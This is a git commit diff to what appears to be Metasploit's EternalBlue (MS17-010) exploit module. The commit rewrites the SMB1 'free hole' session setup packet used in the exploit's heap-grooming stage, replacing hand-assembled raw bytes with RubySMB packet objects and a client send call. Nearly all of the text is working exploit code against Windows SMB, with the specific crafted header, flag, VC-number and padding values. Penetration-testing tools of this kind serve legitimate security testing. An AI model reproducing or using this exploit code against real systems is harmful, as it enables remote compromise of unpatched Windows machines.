update SMB1 "Freehole" packet

the 'Freehole' packet is now generated with RubySMB and sent by the client, rather than raw bytes sent over the bare socket
2017-05-25 13:43:16 -05:00 · 2017-05-25 13:43:16 -05:00 · 0b0e2f64ca
parent bc8ad811aa
commit 0b0e2f64ca
1 changed files with 15 additions and 43 deletions
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@ -358,13 +358,8 @@ class MetasploitModule < Msf::Exploit::Remote
      pkt = make_smb1_free_hole_session_packet("\x07\x40", "\x2c\x01", "\xf8\x87\x00\x00\x00")
    end

-    #dump_packet(pkt)
-    sock.put(pkt)
-
-    vprint_status("Receiving free hole response.")
-    sock.get_once
-
-    return sock
+    client.send_recv(pkt)
+    sock
  end

  def smb1_get_response(sock)
@ -575,44 +570,21 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)
-    pkt = ""
-    pkt << "\x00"                   # Session message
-    pkt << "\x00\x00\x51"           # length
-    pkt << "\xffSMB"                # SMB1
-    pkt << "\x73"                   # Session Setup AndX
-    pkt << "\x00\x00\x00\x00"       # NT SUCCESS
-    pkt << "\x18"                   # Flags
-    pkt << flags2                   # Flags2
-    pkt << "\x00\x00"               # PID High
-    pkt << "\x00\x00\x00\x00"       # Signature1
-    pkt << "\x00\x00\x00\x00"       # Signature2
-    pkt << "\x00\x00"               # Reserved
-    pkt << "\x00\x00"               # TreeID
-    pkt << "\xff\xfe"               # PID
-    pkt << "\x00\x00"               # UserID
-    pkt << "\x40\x00"               # MultiplexID
-    #pkt << "\x00\x00"               # Reserved
+    packet = RubySMB::SMB1::Packet::SessionSetupRequest.new

-    pkt << "\x0c"                   # Word Count
-    pkt << "\xff"                   # No further commands
-    pkt << "\x00"                   # Reserved
-    pkt << "\x00\x00"               # AndXOffset
-    pkt << "\x04\x11"               # Max Buffer
-    pkt << "\x0a\x00"               # Max Mpx Count
-    pkt << vcnum                    # VC Number
-    pkt << "\x00\x00\x00\x00"       # Session key
-    pkt << "\x00\x00"               # Security blob length
-    pkt << "\x00\x00\x00\x00"       # Reserved
-    pkt << "\x00\x00\x00\x80"       # Capabilities
-    pkt << "\x16\x00"               # Byte count
-    #pkt << "\xf0"                   # Security Blob: <MISSING>
-    #pkt << "\xff\x00\x00\x00"       # Native OS
-    #pkt << "\x00\x00"               # Native LAN manager
-    #pkt << "\x00\x00"               # Primary domain
-    pkt << native_os
-    pkt << "\x00" * 17              # Extra byte params
+    packet.smb_header.flags.read("\x18")
+    packet.smb_header.flags2.read(flags2)
+    packet.smb_header.pid_high = 65279
+    packet.smb_header.mid      = 64

-    pkt
+    packet.parameter_block.vc_number.read(vcnum)
+    packet.parameter_block.max_buffer_size      = 4356
+    packet.parameter_block.max_mpx_count        = 10
+    packet.parameter_block.security_blob_length = 0
+
+    packet.data_block.native_os       = native_os
+    packet.data_block.native_lan_man  = "\x00" * 17
+    packet
  end

  # ring3 = user mode encoded payload